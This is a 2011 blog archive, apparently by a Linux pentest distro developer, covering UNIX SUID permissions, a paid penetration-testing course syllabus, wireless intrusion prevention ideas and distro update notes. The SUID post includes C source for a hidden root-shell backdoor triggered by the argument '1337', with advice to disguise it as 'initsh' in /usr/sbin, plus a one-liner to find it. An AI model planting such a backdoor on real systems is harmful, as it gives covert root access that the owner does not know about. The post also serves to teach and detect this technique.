Monthly Archives: October 2011

Loading
loading..

Here I explain some system administration on UNIX’s Set User ID, or SUID with a short video tutorial after the break.

In UNIX, we can have files (binaries) that can run as the owner of the file. No matter who executes it. This is called a SUID attribute. You can set a file to SUID with:

chmod +4XXX file.exe

I put the exe extension just to show that the file is binary. If you chown (change ownership) of this to root, it will be ran as UID (User ID) “0″ or user “root.” Here is what the file looks like after chmod(ing) it to 4XXX (XXX being your normal rwxrwxrwx settings, exempli gratia – 777, 755, etc. in our case I used 4755):

-rwsr-xr-x 1 root root 0 2011-10-27 22:21 file.exe

Here is what this means: the capital “s” means the file is “suid” or “set user id” which means it will change to the owner’s (in our case “root”) UID of “0″ before executing.
The “r” is “read,” “w” is “write,” and “x” is “executable” BY sets of three for: Owner,Group,Other respectively.

How does it know the UID of the owner root, you say? It most likely looks at the lines in /etc/passwd:

root:x:0:0:root:/root:/bin/bash

The first zero is the UID, the second is the GUID, or Group User ID. the “x” means that the password hash and salt are hidden in the /etc/shadow file.

Now, this does not work with shell scripts for more than just security purposes. If you’d like to do something like that, you would need to play with sudo and the sudoers file, but not all UNIX systems come with sudo.

So how do we work around that? By compiling an easy C program that runs it via a system() call!

#include<stdio.h>
#include<stdlib.h>
int main(int argc, char *argv[]){
 if(atoi(argv[1]) == 1337){
  printf("shelling out.\n");
  system ("sh");
 }
 else{ }
 return 0;
}

All this simple application does is run “sh”, or spawn a new shell, as root IFF the number “1337″ is passed to it. Why did I include the number part? Well, to backdoor a system it’s incredibly easy to hide this small application, and since it must|is compiled, if found, the owner of the machine won’t know what it is. I usually call this something like “initsh” and put it in /usr/sbin to look very non suspicious to the novice system administrator. My secret is out!!

echo $PATH | sed 's/:/\n/g' | xargs ls | grep initsh

Check out the video below:

~Douglas.

Here is the first screenshot from my development (Click for full sized view):

~Douglas.

One of my Beta testers hosts his own infosec training course called “Ninja Security.” I had the pleasure of taking some of the course materials (Real world Penetration Testing) and, even though they were in Arabic language, the OS, presentations, and configuration files were all in English, so it wasn’t hard to follow along at all. He attacks vulnerabilities very creatively and his presentation is very clear. He even uses WEAKERTHAN 3.6 for the WPA(2) Phishing Attack, and WiFiCake-ng! :D The Ninja Security Teams Penetration testing to the Max course is completely in English and his their latest course release.

http://ninja-sec.com/

Ninja Security Syllabus

Information Intelligence Techniques

• Open Source Intelligence Gathering
• Stealth Auditing and Network Scanning
• Advanced Network Reconnaissance
• Enumerating Internal Network From Outside

Web Exploitation Techniques

• Advanced SQL Injection Exploitation (MYSQL + MS-SQL + ORACLE )
• Advanced Blind SQL Injection Exploitation (MYSQL + ORACLE )
• Exploiting File Uploads to Full System Access
• Exploiting Remote File Include to Full System Access
• Exploiting Local File Include to Full System Access
• Exploiting XSS Reflected to Full System Access
• Exploiting XSS Stored to Full System Access
• Exploiting Command Injection to Full System Access
• Exploiting CSRF to Full System Access

Attacking and Owning Techniques

• Owning FULLY PATCHED systems with ( un-guessable/un-crackable passwords and OS protections like ASLR and DEP )
• Owning Windows Domain Controller from Outside
• Owning Windows Domain Controller from Inside
• Owning MS-SQL-Oracle-MySQL Databases
• Attacking and Owning VOIP Systems

Privilege Escalation Techniques

• Privilege Escalation in Windows ( from Guest to System )
• Privilege Escalation in Linux ( from nobody to Root )

Tactical Post Exploitation Techniques

• Tactical Windows Post Exploitation
• Tactical Linux Post Exploitation
• Tactical Mac OS X Post Exploitation

Bypassing and Defeating Techniques

• Bypassing and Escaping Restricted Environments
• Bypassing Group Policy
• Evading Anti-Virus ( 100% clean )
• Defeating PHP security
• Defeating (XSS , Sql Injection , File Upload ) Protections
• Defeating Web Application Firewall (mod security)
• Bypassing Port Security and NAC solutions
• Prerequisites: Students should be familiar with Metasploit, and VMWARE.
• Pricing: 1,500 USD
• what is included : Course Guide , Videos , Tools and Vmware Images are provided.

I’d fully recommend it, [Real World Penetration Testing] even to those who do not speak Arabic, simply for the clear demonstrations, huge amount of hard work planted into the course materials, and for his support. And again, the latest course by the Ninja Security team is completely in English: Penetration testing to the Max. :)

Thank you Ninja Security Team!!

~Douglas.

Thomas d’Otreppe’s latest work on creating an open source WIPS (wireless intrusion prevention system) at DerbyCon:

This is a good video, and his methods are creative, but all of which are some things I have been thinking over for about 2 years now. My first implementation of an openWIPS (which took me about a year to finally start coding it) was a simple script that ran from a “server” just like his:

Then, after being interviewed by a security consultant, He gave me the idea to implement this directly in the router itself:

What his [Thomas's] OpenWIPS-ng has over mine is actual “frame analysis.” At the time, I wasn’t as familiar with C programming and libpcap – and decided it wasn’t really necessary to re-invent the wheel, as I knew how TCP/IP handled things like broadcast frames within a simple BSS. Thus, I used TCPdump. :) I am excited for his project and would love to contribute, but I’m already too swamped with my own projects now. What would be a good idea is to make, yet another, live CD just for his project. You could configure Lighttpd/Apache2/Inginx to run as root and create a nice web interface to log into and run the commands, analyze the logs, etc. :)

Then, just as I was studying for the CWSP exam, I thought of two things: First is the WPA(2) Phishing Attack (WPA). This attack simply creates an AP from a radio and hosts a DHCP server and HTTP server. When the victim attaches to the (cloned) network, he or she is presented with a typical Windows login screen:

Which brings me to final WIPS theory which I had. The second idea – was a true protocol (802.11) amendment, (close to 802.11w, which has yet to be implemented) which protects the network from injected MGMT frames:

It uses power statistics at the medium level to protect the network from frames that do not fall within the simple threshold which the math creates within the firmware of the radios.

The mailing lists are compiled. The kernel is under dev. A few of you already asked about e17 and it looks like I am sticking with FluxBox for the window manager. There are still a few bugs in e17 that get under my skin and FB is super light weight.

If you have any requests for software I should add, including your own, let me know! I am going by these statistics: http://bit.ly/pkeF0j for my release. Some software I have been working on fell perfectly into those forums posts, including the pCrack Suite, and this also gives me a chance to learn about new products along the way.

I will add a GUI application version of xrandr and a few others to reset the wallpaper and screen sizes. Also a few heavy changes have been made to WiFiCake-NG which will be released in the latest version of WT4.

Thanks for stopping by!

Layout mode
Predefined Skins
Custom Colors
Choose your skin color
Patterns Background
Images Background